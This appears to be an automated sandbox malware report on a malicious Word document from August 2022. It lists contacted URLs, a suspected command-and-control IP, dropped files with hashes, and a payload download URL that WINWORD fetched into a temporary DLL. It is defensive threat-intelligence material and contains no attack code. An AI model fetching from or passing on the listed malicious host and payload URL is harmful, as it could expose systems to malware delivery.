                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                              		high
                                                                                              https://substrate.office.comWWINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://wus2.contentsync.WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://globaldisco.crm.dynamics.comomWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://clients.config.office.net/user/v1.0/iosAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizevB&LWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizegWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://login.windows.net/common/oauth2/authorize~hWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://o365auditrealtimeingestion.manage.office.comWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorizeN=WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeQWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.odwebp.svc.msomWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeCacheWINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeRWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizek27LWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeSWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://powerlift.acompli.netPrqLWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://lifecycle.office.comovWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://entitlement.diagnostics.office.comAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                          		high
                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorize7ehMWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorizeMWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://storage.live.com/clientlogs/uploadlocationWINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://dataservice.o365filtering.comVbWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://login.windows.net/common/oauth2/authorize=WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize0WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallationAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://analysis.windows.net/powerbi/api/WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              45.8.146.139
                                                                                                                                              		unknownRussian Federation
                                                                                                                                              		44676VMAGE-ASRUfalse

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                              Analysis ID:682599
                                                                                                                                              Start date and time:2022-08-11 18:47:00 +02:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 7m 5s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:cnewton doc 08.11.2022.doc
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:34
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal80.expl.winDOC@3/11@0/1
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .doc
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Unable to detect Microsoft Word
                                                                                                                                              • Close Viewer

                                                                                                                                              Errors

                                                                                                                                              • Corrupt sample or wrongly selected analyzer.

                                                                                                                                              Warnings

                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.88.39, 52.109.76.33, 20.189.173.22
                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              18:50:39API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              No context

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASNs

                                                                                                                                              No context

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WINWORD.EXE_36a787bf8896eba6a9e85f1761f2a7eec6686b_5f94c319_0fad4122\Report.wer

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):1.6334309996142495
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:WO0TZNUH7OHSTjjKYbVrP5UFAsRJp/u7sfS274Itu:30nc7OHSTjN507RJp/u7sfX4Itu
                                                                                                                                              MD5:7823330D3A564F8BA4558D06D5292363
                                                                                                                                              SHA1:86A935AA4B758D6C68D8D9016AAB37BFCFAF4DDC
                                                                                                                                              SHA-256:9CFA5323284477A801239B70EB208AFE51CBC3F6B7F70400EA4489669EA15519
                                                                                                                                              SHA-512:A409F887002A345FAADACA4F90635E060CD999B7C767AD10B9D5A263405456B77CBA9D45EA420669ACCB68EA50D8FF3D6EB488A1B5F4E5CC9E11E701FAF99A13
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.4.7.4.2.6.3.4.1.7.5.4.8.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.4.7.4.2.6.3.8.5.8.1.7.0.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.5.f.5.7.4.c.-.7.c.1.5.-.4.e.4.d.-.b.5.e.f.-.3.1.2.2.2.0.e.3.5.6.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.2.f.c.8.a.5.-.e.2.4.7.-.4.6.5.8.-.9.5.7.2.-.6.7.3.d.a.b.5.c.1.e.0.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.I.N.W.O.R.D...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.n.W.o.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.4.-.0.0.0.1.-.0.0.1.d.-.f.4.b.6.-.8.b.c.c.e.d.a.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.9.8.d.3.2.8.7.9.1.6.f.3.7.4.a.8.3.9.5.5.6.0.5.5.d.0.3.4.2.7.0.0.0.0.0.0.0.0.!.0.0.0.0.4.0.4.d.e.7.5.4.4.5.9.8.f.0.8.7.2.3.e.a.1.f.1.3.c.0.7.2.4.a.e.f.5.a.c.5.a.f.3.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A7D.tmp.dmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Fri Aug 12 01:50:36 2022, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313988
                                                                                                                                              Entropy (8bit):2.5850247553267334
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:WVoBIphIVMxJU8S4dIpFr04Kgbz5MPm8zjs9Exh:vIpht7Ux6IpFA4bl0m8zjQ6h
                                                                                                                                              MD5:3D9A73E636B1C1F34CB6B65BAF46BE2B
                                                                                                                                              SHA1:CDDDB8DE4B332FFAC568A020AA202DDB7DAB0731
                                                                                                                                              SHA-256:B2F74F921A0CD45FBFF72D9765510307BC0DEE132A2F3F930110640EBC5758EF
                                                                                                                                              SHA-512:DED567DD31B1241DFDA331BA6AEC3D2C1919CA3C539462F4F0CB3C4AF16DBE03A395992A15922B74D9B13E8D1CE746E28D38FB6A5ED78599924D0FA8A831A788
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:MDMP....... .........b............$............;..8............F......T...............`.......8...........T................(..........tH..........`J...................................................................U...........B.......J......GenuineIntelW...........T..............b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER37FB.tmp.WERInternalMetadata.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8354
                                                                                                                                              Entropy (8bit):3.7070758599053892
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNi+J6/E6YTCSUj0gmfLSD2CpD/89b7VsfBJm:RrlsNio6c6Y2SUj0gmfLSD27uf+
                                                                                                                                              MD5:0B814D3C3621EA41B83E83B0880E5DBC
                                                                                                                                              SHA1:468C48576BA01A6BDF9D6E183D64489B1304D453
                                                                                                                                              SHA-256:747DC959C798AAF6A63F0A4D88A40EFE52055809C03EEA9FE7A75DAFE6C4C250
                                                                                                                                              SHA-512:C76894DE52F5209061D328E9ECF33D92AF526D7134DC9735C28D0EBBEBE8FF3BD0C008373ACE95B324EA20E83F1470C27C1445B9DB687BBA3CE8DF5E91A11057
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.2.0.<./.P.i.d.>.......

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER39C1.tmp.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4671
                                                                                                                                              Entropy (8bit):4.528605782124211
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zsCJgtWI9+QWgc8sqYjSb8fm8M4JxTF7+q88H8UvFeVrd:uITfQBpgrsqYpJP9Tvord
                                                                                                                                              MD5:92A97B5F7EB8A0D067DF0FEFD81B3F72
                                                                                                                                              SHA1:A6099EF86AEE73817D1DF8FDE8EE893D7AD70D65
                                                                                                                                              SHA-256:43E152F2A6754849FC1D5525838FDBD23AA047E5570F5DF316949990004CD34E
                                                                                                                                              SHA-512:A33B55E3A413594A304A3109EE640F2BD4E7888E86B33A9F7384E5C334A4135AEDC7E94B78698AA87443E24D98B0B9739F2DFECAC6A4FEA581F8DB2EC0BAB355
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1643701" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AE1D8E82-09A3-4CE3-BB95-E3559641C73B

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):148061
                                                                                                                                              Entropy (8bit):5.358162672109645
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:fcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:e1Q9DQe+zuXYr
                                                                                                                                              MD5:1143367FAE88FC7686F3EAC21A38B19D
                                                                                                                                              SHA1:3B2DA22F514C7333983B8FDD501EFF3CA489C181
                                                                                                                                              SHA-256:65A50C37FEAB01B1CC298E37678A600DBD38D17953D5A4426385AEDC68FAA88A
                                                                                                                                              SHA-512:66C763003B754C5F00B595AB1FF232FC2028CDD71AB32EBDFDF8CE8BDB22E658273ADBCE4A7BB741CB65288C387979932627D36EF87248696C5E150602998D96
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T16:49:49">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\-f[1].htm

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):201
                                                                                                                                              Entropy (8bit):5.120826232488609
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                              MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                              SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                              SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                              SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              IE Cache URL:http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\y5A7.tmp.dll

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):201
                                                                                                                                              Entropy (8bit):5.120826232488609
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                              MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                              SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                              SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                              SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\cnewton doc 08.11.2022.doc.LNK

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:50 2022, mtime=Fri Aug 12 00:49:52 2022, atime=Fri Aug 12 00:49:44 2022, length=2248355, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1115
                                                                                                                                              Entropy (8bit):4.700357953541246
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8gBjEu0U8uElPCH2PQJ2Y88VC+WaKOQl1GTjA2N/rV7p9LrAG9DInRo5k4t2Y+x4:88bJOhEAKThp95DAC67aB6m
                                                                                                                                              MD5:3FE4E7082455A40B3CACDA2714068F60
                                                                                                                                              SHA1:B8520CB7AD8549DEB579DE9820961791BE6E5535
                                                                                                                                              SHA-256:E1922E600A5FAAFFE1B060150557FD7941326BEE950DEBA2ECB0100D2992F799
                                                                                                                                              SHA-512:1673B3C5C195681299C49FCCE4F783188590E93A20E6F90BD290A1BA39251E90DF82DDD68A11DD314CCCA2E633FBD7C12B12C741818B4CBACEC42327B59B8E49
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:L..................F.... .....i..3....`.....P......N"..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U/.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U/......S......................r.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U/......Y..............>.......#.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..N"..U7. .CNEWTO~1.DOC..f......hT...U7.....h.........................c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.......`...............-......._...........>.S......C:\Users\user\Desktop\cnewton doc 08.11.2022.doc..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...O............-..!a..%.H.VZAj...O............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):103
                                                                                                                                              Entropy (8bit):4.575284965391289
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:bDuMJle+FXF7Uk9TLBCmX1c6FXF7Uk9TLBCv:bCMXF7p9HBCuXF7p9HBs
                                                                                                                                              MD5:883DB290C57C4E606337478F65B9586D
                                                                                                                                              SHA1:0DE009D3CAA7D6FF00C62C71258E8ECF34688E18
                                                                                                                                              SHA-256:1D1108C167D9D37D26F39A551DF8370F7EC2A0A1D608BA7696DC090FB11000C4
                                                                                                                                              SHA-512:3B4349DCD4B6B0471FC1EBBD304B22AB74DE2C1B1672EC62782258DE4800D4C5E4E65AA7CBB748AC7EEA22A88F2009E2CDC6436622AD35F3E90A4E78ABFFCB1F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[folders]..Templates.LNK=0..cnewton doc 08.11.2022.doc.LNK=0..[doc]..cnewton doc 08.11.2022.doc.LNK=0..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
